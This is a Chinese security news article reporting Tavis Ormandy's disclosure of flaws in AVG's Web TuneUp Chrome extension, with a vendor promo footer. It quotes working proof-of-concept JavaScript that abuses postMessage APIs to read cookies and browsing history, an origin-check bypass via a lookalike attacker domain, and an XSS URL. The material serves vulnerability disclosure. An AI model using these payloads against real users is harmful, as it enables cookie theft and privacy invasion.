您当前位置:首页 > 资讯中心 > 信息安全

谷歌浏览器插件曝多个高危漏洞,影响900万用户

这个插件添加了很多的api用来操作谷歌浏览器,比如可以轻易的劫持搜索框和新标签页。而由于其安装过程十分复杂,所以能够逃避谷歌恶意软件的检查,特别是能够逃避谷歌浏览器“阻止滥用扩展的API”的检查。

事实上其中的很多api是有问题的,攻击者可以通过构造payload成功盗取用户在avg.com上的cookie,还可以获取用户的浏览记录以及其他的私人数据,甚至有可能成功实施任意命令执行。

攻击手法

Tavis在给厂商的邮件中列举了几种攻击手法:"navigate" API 将会导致一个通用的跨域xss漏洞,attacker.com可以跨域读取访问者的mail.google.com的邮件或者是来自于其他网站的数据。

  1. <script> 
  2.     for (i = 0; i < 256; i++) { 
  3.         window.postMessage({ origin: "web", action: "navigate", data: { 
  4.            url: "javascript:document.location.hostname.endsWith('.avg.com')" 
  5.                 + "?" 
  6.                     + "alert(document.domain + ':' +document.cookie)" 
  7.                 + ":" 
  8.                     + "false"
  9.            tabID: i 
  10.         }}, "*"); 
  11.     } 
  12. </script> 

以上代码为Tavis给的poc

通过 window.postMessage(允许跨域通信的javascript api) 不间断的向 AVG: "Web TuneUP”插件发起请求,请求的数据为:

  1. { origin: "web", action: "navigate", data: {url:"javascript:document.location.hostname.endsWith('.avg.com')""?""alert(document.domain + ':' +document.cookie)"":""false",tabID: i}} 

当用户的标签页在访问avg.com网站时,将爆破以.avg.com结尾的网站的当前域名和cookie值。"recently" api将会泄露当前用户的浏览记录

  1. <script> 
  2. window.addEventListener("message", receiveMessage, false); 
  3. window.postMessage({ from: "web", to: "content", method: "recently" }, "*"
  4.   
  5. function receiveMessage(event) 
  6.     if (event.data != undefined && event.data.historyItems != undefined) { 
  7.         var obj = JSON.parse(event.data.historyItems); 
  8.   
  9.         document.write("Here is a list of websites you've been visiting"); 
  10.         document.write("<br>"); 
  11.         for (i in obj) { 
  12.             var d = new Date(obj[i]); 
  13.             document.write("<a href=" + i + ">" + i + "</a> on " + d); 
  14.             document.write("<br>"); 
  15.         } 
  16.     } 
  17. </script> 

以上代码为Tavis给的poc

通过window.postMessage向插件的"recently"API发起请求获取当前用户的浏览记录,本地监听事件来获取返回的数据,然后输出数据。

随后厂商对此进行了修复,但是由于修复的不对,又被Tavis绕过了。修复的代码中增加了判断

  1. var match = event.origin.match(/https?:\/\/.*\.avg\.com/i); 
  2.   
  3. if (match ! null { 
  4. ... 

判断来源是不是包含".avg.com",但是这个很容易被绕过。比如https://www.avg.com.www.attacker.com这个域名就能绕过这个限定,继续实施上面提到的两个攻击。又会因为上面的对协议的判断是既支持http又支持https,于是又产生了“中间人攻击”这个问题。

厂商对此又进行了修复,这次限制了域名必须为"mysearch.avg.com"和"webtuneup.avg.com" 。但通过下面这个xss,他又可以对用户数据进行窃取:

http://webtuneup.avg.com/static/dist/app/4.0.5.0/interstitial.html?risk=%3Cimg%20src=x%20onerror=alert(1)%3E&searchParams=%7B%22lang%22%3A%22en%22%2C%22pid%22%3A%22pid%22%2C%22v%22%3A%22vv%22%7D

【编辑推荐】

  1. 多个Oracle高危险漏洞
  2. 业界质疑谷歌浏览器安全使用报告
  3. eFast:山寨谷歌浏览器恶意来袭
作者:grabsun - 发布时间:2016-01-05 - 点击量:2716
公司简介:大势至公司是国内较早的企业网管软件提供商,可以为企事业单位提供整体的企业网络管理方案和企业网络管理平台,通过全系列的公司监控员工电脑软件教你如何控制员工上网、如何控制局域网内电脑上网以及如何保护电脑文件安全等。公司核心产品“聚生网管系统”是一款专门的公司网管必备软件、查看网络流量软件、网络流量监控软件和办公室电脑监控软件;“网络特警”则是一款专门的网络流量监控设备、上网行为管理服务器、网络行为管理设备,可以实现更为强大的局域网网络行为管理;大势至USB接口禁用软件则是一款专门的数据防泄密产品、屏蔽U盘软件、电脑USB端口禁用软件,可以严防通过一切途径泄露电脑文件,保护单位无形资产和商业机密安全;大势至共享文件夹管理软件则是一款专门的共享文件权限设置软件和共享文件设置密码软件,全面保护共享文件安全;大势至共享文件审计系统则是一款专门的服务器共享文件夹设置软件、服务器共享文件访问日志记录软件,可以详细记录局域网用户访问共享文件的行为,更好地管理共享文件的安全;大势至局域网网络准入控制系统则是一款专门防止未经授权的电脑接入公司局域网的行为,防止外来电脑访问局域网共享文件、防止蹭网以及绑定IP和MAC地址,保护网络安全;大势至FTP服务器日志记录软件则是一款专门记录局域网用户访问FTP服务器日志的软件,可以有效保护FTP服务器文件安全。
联系我们